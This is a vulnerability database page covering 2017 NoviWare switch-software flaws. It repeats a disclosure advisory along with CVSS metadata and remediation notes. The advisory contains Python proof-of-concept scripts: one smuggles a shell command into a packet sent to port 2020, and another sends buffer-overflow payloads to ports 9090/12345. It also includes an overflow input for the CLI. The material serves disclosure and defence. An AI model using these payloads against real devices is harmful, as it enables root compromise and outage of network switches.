Search criteria
12 vulnerabilities found for noviware by noviflow
VAR-201708-1145
Vulnerability from variot - Updated: 2025-04-20 23:04The novish command-line interface, included in the NoviWare software distribution through NW400.2.6 and deployed on NoviSwitch devices, is prone to a buffer overflow in the "show log cli" command. This could be used by a read-only user (monitor role) to gain privileged (root) code execution on the switch via command injection. NoviWare Contains a buffer error vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. NoviFlow NoviWare <= NW400.2.6 multiple vulnerabilities
Introduction
NoviWare is a high-performance OpenFlow 1.3, 1.4 and 1.5 compliant switch software developed by NoviFlow and available for license to network equipment manufacturers. Multiple vulnerabilities were identified in the NoviWare software deployed on NoviSwitch devices.
CVEs
-
CVE-2017-12784: remote code execution in novi_process_manager_daemon Indicative CVSS v2 base score: 7.6 (AV:N/AC:H/Au:N/C:C/I:C/A:C)
-
CVE-2017-12785: cli breakout in novish Indicative CVSS v2 base score: 6.8 (AV:L/AC:L/Au:S/C:C/I:C/A:C)
-
CVE-2017-12786: remote code execution in noviengine and cliengine Indicative CVSS v2 base score: 7.6 (AV:N/AC:H/Au:N/C:C/I:C/A:C)
Affected versions
NoviWare <= NW400.2.6 and devices where a vulnerable NoviWare version is deployed
Author
FranASSois Goichon - Google Security Team
CVE-2017-12784
Remote code execution in novi_process_manager_daemon
Summary
The NoviWare switching software distribution is prone to two distinct bugs which could potentially allow a remote, unauthenticated attacker to gain privileged (root) code execution on the switch device. - A flaw when applying ACL changes requested from the CLI could expose the novi_process_manager_daemon network service - This network service is prone to command injection and a stack-based buffer overflow
Reproduction
If TCP port 2020 is accepting connections from the network, the following python script can be used to ping yourself on vulnerable versions :
from struct import pack import socket
s = socket.socket() s.connect((, 2020))
payload = pack("<I", 0xffffffff).ljust(0x24) + "ping ; echo\x00" s.sendall(pack("<II", 1, len(payload)+8)) s.sendall(payload)
s.close()
On vulnerable versions, the appliance will perform an ICMP request to the specified IP, which can be observed in network logs.
Remediation
- Upgrade to NoviWare400 3.0 or later.
- NoviFlow customers should have received instructions on how to get the latest release along with release notes. For more information, contact support@noviflow.com.
Reproduction
Log in to the appliance via SSH and run the following command from the CLI:
noviswitch# show log cli username AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA --
If the appliance is vulnerable, the cli crashes and the session ends.
Remediation
- Upgrade to NoviWare400 3.0 or later.
- NoviFlow customers should have received instructions on how to get the latest release along with release notes. For more information, contact support@noviflow.com.
- A flaw when applying ACL changes requested from the CLI could expose noviengine and cliengine network services
- These network services are prone to a stack-based buffer overflow when unpacking serialized values.
Reproduction
If TCP ports 9090 or 12345 are accepting connections from the network, the following python script can be used to cause a crash on vulnerable versions :
from struct import pack import socket
s = socket.socket() s.connect((, <9090 or 12345>))
payload = "".join([pack("<I", 4) + "AAAA" for i in xrange(408)]) payload = pack("<IIQ", 0, len(payload) + 16, 0) + payload s.sendall(payload)
s.read(1) s.close()
A watchdog should restart the service if it has crashed.
Remediation
- Upgrade to NoviWare400 3.0 or later.
- NoviFlow customers should have received instructions on how to get the latest release along with release notes. For more information, contact support@noviflow.com.
Disclosure timeline
2017/05/11 - Report sent to NoviFlow 2017/05/26 - Bugs acknowledged and remediation timeline confirmed 2017/07/27 - NoviWare400 3.0 release fixes all the above vulnerabilities 2017/08/09 - CVE requests 2017/08/16 - Public disclosure
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201708-1145",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "noviware",
"scope": "lte",
"trust": 1.0,
"vendor": "noviflow",
"version": "400.2.6"
},
{
"model": "noviware",
"scope": "lte",
"trust": 0.8,
"vendor": "noviflow",
"version": "nw400.2.6"
},
{
"model": "noviware",
"scope": "eq",
"trust": 0.6,
"vendor": "noviflow",
"version": "400.2.6"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-007313"
},
{
"db": "CNNVD",
"id": "CNNVD-201708-459"
},
{
"db": "NVD",
"id": "CVE-2017-12785"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/a:noviflow:noviware",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-007313"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Francois Goichon",
"sources": [
{
"db": "PACKETSTORM",
"id": "143818"
}
],
"trust": 0.1
},
"cve": "CVE-2017-12785",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "CVE-2017-12785",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 1.9,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 3.9,
"id": "CVE-2017-12785",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.8,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2017-12785",
"trust": 1.0,
"value": "CRITICAL"
},
{
"author": "NVD",
"id": "CVE-2017-12785",
"trust": 0.8,
"value": "Critical"
},
{
"author": "CNNVD",
"id": "CNNVD-201708-459",
"trust": 0.6,
"value": "CRITICAL"
},
{
"author": "VULMON",
"id": "CVE-2017-12785",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2017-12785"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-007313"
},
{
"db": "CNNVD",
"id": "CNNVD-201708-459"
},
{
"db": "NVD",
"id": "CVE-2017-12785"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The novish command-line interface, included in the NoviWare software distribution through NW400.2.6 and deployed on NoviSwitch devices, is prone to a buffer overflow in the \"show log cli\" command. This could be used by a read-only user (monitor role) to gain privileged (root) code execution on the switch via command injection. NoviWare Contains a buffer error vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. NoviFlow NoviWare \u003c= NW400.2.6 multiple vulnerabilities\n\n\nIntroduction\n==========\nNoviWare is a high-performance OpenFlow 1.3, 1.4 and 1.5 compliant\nswitch software developed by NoviFlow and available for license to\nnetwork equipment manufacturers. \nMultiple vulnerabilities were identified in the NoviWare software\ndeployed on NoviSwitch devices. \n\n\nCVEs\n=====\n* CVE-2017-12784: remote code execution in novi_process_manager_daemon\nIndicative CVSS v2 base score: 7.6 (AV:N/AC:H/Au:N/C:C/I:C/A:C)\n\n* CVE-2017-12785: cli breakout in novish\nIndicative CVSS v2 base score: 6.8 (AV:L/AC:L/Au:S/C:C/I:C/A:C)\n\n* CVE-2017-12786: remote code execution in noviengine and cliengine\nIndicative CVSS v2 base score: 7.6 (AV:N/AC:H/Au:N/C:C/I:C/A:C)\n\n\nAffected versions\n==============\nNoviWare \u003c= NW400.2.6 and devices where a vulnerable NoviWare version\nis deployed\n\n\nAuthor\n======\nFranASSois Goichon - Google Security Team\n\n\nCVE-2017-12784\n==============\nRemote code execution in novi_process_manager_daemon\n\nSummary\n-------------\nThe NoviWare switching software distribution is prone to two distinct\nbugs which could potentially allow a remote, unauthenticated attacker\nto gain privileged (root) code execution on the switch device. \n- A flaw when applying ACL changes requested from the CLI could expose\nthe novi_process_manager_daemon network service\n- This network service is prone to command injection and a stack-based\nbuffer overflow\n\nReproduction\n------------------\nIf TCP port 2020 is accepting connections from the network, the\nfollowing python script can be used to ping yourself on vulnerable\nversions :\n---\nfrom struct import pack\nimport socket\n\ns = socket.socket()\ns.connect((\u003cswitch host\u003e, 2020))\n\npayload = pack(\"\u003cI\", 0xffffffff).ljust(0x24) + \"ping \u003cyour ip\u003e; echo\\x00\"\ns.sendall(pack(\"\u003cII\", 1, len(payload)+8))\ns.sendall(payload)\n\ns.close()\n---\n\nOn vulnerable versions, the appliance will perform an ICMP request to\nthe specified IP, which can be observed in network logs. \n\nRemediation\n-----------------\n- Upgrade to NoviWare400 3.0 or later. \n- NoviFlow customers should have received instructions on how to get\nthe latest release along with release notes. For more information,\ncontact support@noviflow.com. \n\nReproduction\n------------------\nLog in to the appliance via SSH and run the following command from the CLI:\n--\nnoviswitch# show log cli username\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\n--\n\nIf the appliance is vulnerable, the cli crashes and the session ends. \n\nRemediation\n-----------------\n- Upgrade to NoviWare400 3.0 or later. \n- NoviFlow customers should have received instructions on how to get\nthe latest release along with release notes. For more information,\ncontact support@noviflow.com. \n- A flaw when applying ACL changes requested from the CLI could expose\nnoviengine and cliengine network services\n- These network services are prone to a stack-based buffer overflow\nwhen unpacking serialized values. \n\nReproduction\n------------------\nIf TCP ports 9090 or 12345 are accepting connections from the network,\nthe following python script can be used to cause a crash on vulnerable\nversions :\n---\nfrom struct import pack\nimport socket\n\ns = socket.socket()\ns.connect((\u003cswitch host\u003e, \u003c9090 or 12345\u003e))\n\npayload = \"\".join([pack(\"\u003cI\", 4) + \"AAAA\" for i in xrange(408)])\npayload = pack(\"\u003cIIQ\", 0, len(payload) + 16, 0) + payload\ns.sendall(payload)\n\ns.read(1)\ns.close()\n---\n\nA watchdog should restart the service if it has crashed. \n\nRemediation\n-----------------\n- Upgrade to NoviWare400 3.0 or later. \n- NoviFlow customers should have received instructions on how to get\nthe latest release along with release notes. For more information,\ncontact support@noviflow.com. \n\n\nDisclosure timeline\n===============\n2017/05/11 - Report sent to NoviFlow\n2017/05/26 - Bugs acknowledged and remediation timeline confirmed\n2017/07/27 - NoviWare400 3.0 release fixes all the above vulnerabilities\n2017/08/09 - CVE requests\n2017/08/16 - Public disclosure\n\n\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2017-12785"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-007313"
},
{
"db": "VULMON",
"id": "CVE-2017-12785"
},
{
"db": "PACKETSTORM",
"id": "143818"
}
],
"trust": 1.8
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://vulmon.com/exploitdetails?qidtp=exploitdb\u0026qid=42518",
"trust": 0.1,
"type": "exploit"
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2017-12785"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2017-12785",
"trust": 2.6
},
{
"db": "EXPLOIT-DB",
"id": "42518",
"trust": 2.5
},
{
"db": "JVNDB",
"id": "JVNDB-2017-007313",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201708-459",
"trust": 0.6
},
{
"db": "VULMON",
"id": "CVE-2017-12785",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "143818",
"trust": 0.1
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2017-12785"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-007313"
},
{
"db": "PACKETSTORM",
"id": "143818"
},
{
"db": "CNNVD",
"id": "CNNVD-201708-459"
},
{
"db": "NVD",
"id": "CVE-2017-12785"
}
]
},
"id": "VAR-201708-1145",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.32692307
},
"last_update_date": "2025-04-20T23:04:26.327000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "NoviWare",
"trust": 0.8,
"url": "https://noviflow.com/products/noviware/"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-007313"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-119",
"trust": 1.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-007313"
},
{
"db": "NVD",
"id": "CVE-2017-12785"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.6,
"url": "https://www.exploit-db.com/exploits/42518/"
},
{
"trust": 0.9,
"url": "https://nvd.nist.gov/vuln/detail/cve-2017-12785"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-12785"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/119.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2017-12787"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2017-12786"
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2017-12785"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-007313"
},
{
"db": "PACKETSTORM",
"id": "143818"
},
{
"db": "CNNVD",
"id": "CNNVD-201708-459"
},
{
"db": "NVD",
"id": "CVE-2017-12785"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULMON",
"id": "CVE-2017-12785"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-007313"
},
{
"db": "PACKETSTORM",
"id": "143818"
},
{
"db": "CNNVD",
"id": "CNNVD-201708-459"
},
{
"db": "NVD",
"id": "CVE-2017-12785"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-08-22T00:00:00",
"db": "VULMON",
"id": "CVE-2017-12785"
},
{
"date": "2017-09-19T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2017-007313"
},
{
"date": "2017-08-18T23:44:44",
"db": "PACKETSTORM",
"id": "143818"
},
{
"date": "2017-08-11T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201708-459"
},
{
"date": "2017-08-22T17:29:00.193000",
"db": "NVD",
"id": "CVE-2017-12785"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-08-29T00:00:00",
"db": "VULMON",
"id": "CVE-2017-12785"
},
{
"date": "2017-09-19T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2017-007313"
},
{
"date": "2017-08-23T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201708-459"
},
{
"date": "2025-04-20T01:37:25.860000",
"db": "NVD",
"id": "CVE-2017-12785"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201708-459"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "NoviWare Buffer error vulnerability",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-007313"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "buffer overflow",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201708-459"
}
],
"trust": 0.6
}
}
VAR-201708-1147
Vulnerability from variot - Updated: 2025-04-20 23:04A network interface of the novi_process_manager_daemon service, included in the NoviWare software distribution through NW400.2.6 and deployed on NoviSwitch devices, can be inadvertently exposed if an operator attempts to modify ACLs, because of a bug when ACL modifications are applied. This could be leveraged by remote, unauthenticated attackers to gain resultant privileged (root) code execution on the switch, because incoming packet data can contain embedded OS commands, and can also trigger a stack-based buffer overflow. NoviWare Contains a buffer error vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. NoviFlowNoviWare and NoviSwitchdevices are products of NoviFlow Canada. NoviSwitchdevices is a series of switch devices. NoviWare is the switch software used in it. NoviFlowNoviWareNW400.2.6 and previous versions and noviSwitch devices have a security vulnerability in the network interface of novi_process_manager_daemon. A remote attacker could exploit the vulnerability to execute code with root privileges. NoviFlow NoviWare <= NW400.2.6 multiple vulnerabilities
Introduction
NoviWare is a high-performance OpenFlow 1.3, 1.4 and 1.5 compliant switch software developed by NoviFlow and available for license to network equipment manufacturers. Multiple vulnerabilities were identified in the NoviWare software deployed on NoviSwitch devices.
CVEs
-
CVE-2017-12784: remote code execution in novi_process_manager_daemon Indicative CVSS v2 base score: 7.6 (AV:N/AC:H/Au:N/C:C/I:C/A:C)
-
CVE-2017-12785: cli breakout in novish Indicative CVSS v2 base score: 6.8 (AV:L/AC:L/Au:S/C:C/I:C/A:C)
-
CVE-2017-12786: remote code execution in noviengine and cliengine Indicative CVSS v2 base score: 7.6 (AV:N/AC:H/Au:N/C:C/I:C/A:C)
Affected versions
NoviWare <= NW400.2.6 and devices where a vulnerable NoviWare version is deployed
Author
FranASSois Goichon - Google Security Team
CVE-2017-12784
Remote code execution in novi_process_manager_daemon
Summary
The NoviWare switching software distribution is prone to two distinct bugs which could potentially allow a remote, unauthenticated attacker to gain privileged (root) code execution on the switch device. - A flaw when applying ACL changes requested from the CLI could expose the novi_process_manager_daemon network service - This network service is prone to command injection and a stack-based buffer overflow
Reproduction
If TCP port 2020 is accepting connections from the network, the following python script can be used to ping yourself on vulnerable versions :
from struct import pack import socket
s = socket.socket() s.connect((, 2020))
payload = pack("<I", 0xffffffff).ljust(0x24) + "ping ; echo\x00" s.sendall(pack("<II", 1, len(payload)+8)) s.sendall(payload)
s.close()
On vulnerable versions, the appliance will perform an ICMP request to the specified IP, which can be observed in network logs.
Remediation
- Upgrade to NoviWare400 3.0 or later.
- NoviFlow customers should have received instructions on how to get the latest release along with release notes. For more information, contact support@noviflow.com.
CVE-2017-12785
Cli breakout in novish
Summary
The NoviWare switching software distribution is prone to a buffer overflow and a command injection, allowing authenticated, low-privileged users to break out of the CLI and execute commands as root.
Reproduction
Log in to the appliance via SSH and run the following command from the CLI:
noviswitch# show log cli username AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA --
If the appliance is vulnerable, the cli crashes and the session ends.
Remediation
- Upgrade to NoviWare400 3.0 or later.
- NoviFlow customers should have received instructions on how to get the latest release along with release notes. For more information, contact support@noviflow.com.
- A flaw when applying ACL changes requested from the CLI could expose noviengine and cliengine network services
- These network services are prone to a stack-based buffer overflow when unpacking serialized values.
Reproduction
If TCP ports 9090 or 12345 are accepting connections from the network, the following python script can be used to cause a crash on vulnerable versions :
from struct import pack import socket
s = socket.socket() s.connect((, <9090 or 12345>))
payload = "".join([pack("<I", 4) + "AAAA" for i in xrange(408)]) payload = pack("<IIQ", 0, len(payload) + 16, 0) + payload s.sendall(payload)
s.read(1) s.close()
A watchdog should restart the service if it has crashed.
Remediation
- Upgrade to NoviWare400 3.0 or later.
- NoviFlow customers should have received instructions on how to get the latest release along with release notes. For more information, contact support@noviflow.com.
Disclosure timeline
2017/05/11 - Report sent to NoviFlow 2017/05/26 - Bugs acknowledged and remediation timeline confirmed 2017/07/27 - NoviWare400 3.0 release fixes all the above vulnerabilities 2017/08/09 - CVE requests 2017/08/16 - Public disclosure
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201708-1147",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "noviware",
"scope": "lte",
"trust": 1.0,
"vendor": "noviflow",
"version": "400.2.6"
},
{
"model": "noviware",
"scope": "lte",
"trust": 0.8,
"vendor": "noviflow",
"version": "nw400.2.6"
},
{
"model": "noviware \u003c=nw400.2.6",
"scope": null,
"trust": 0.6,
"vendor": "noviflow",
"version": null
},
{
"model": "noviware",
"scope": "eq",
"trust": 0.6,
"vendor": "noviflow",
"version": "400.2.6"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-29534"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-007315"
},
{
"db": "CNNVD",
"id": "CNNVD-201708-457"
},
{
"db": "NVD",
"id": "CVE-2017-12787"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/a:noviflow:noviware",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-007315"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Francois Goichon",
"sources": [
{
"db": "PACKETSTORM",
"id": "143818"
}
],
"trust": 0.1
},
"cve": "CVE-2017-12787",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "CVE-2017-12787",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 1.9,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
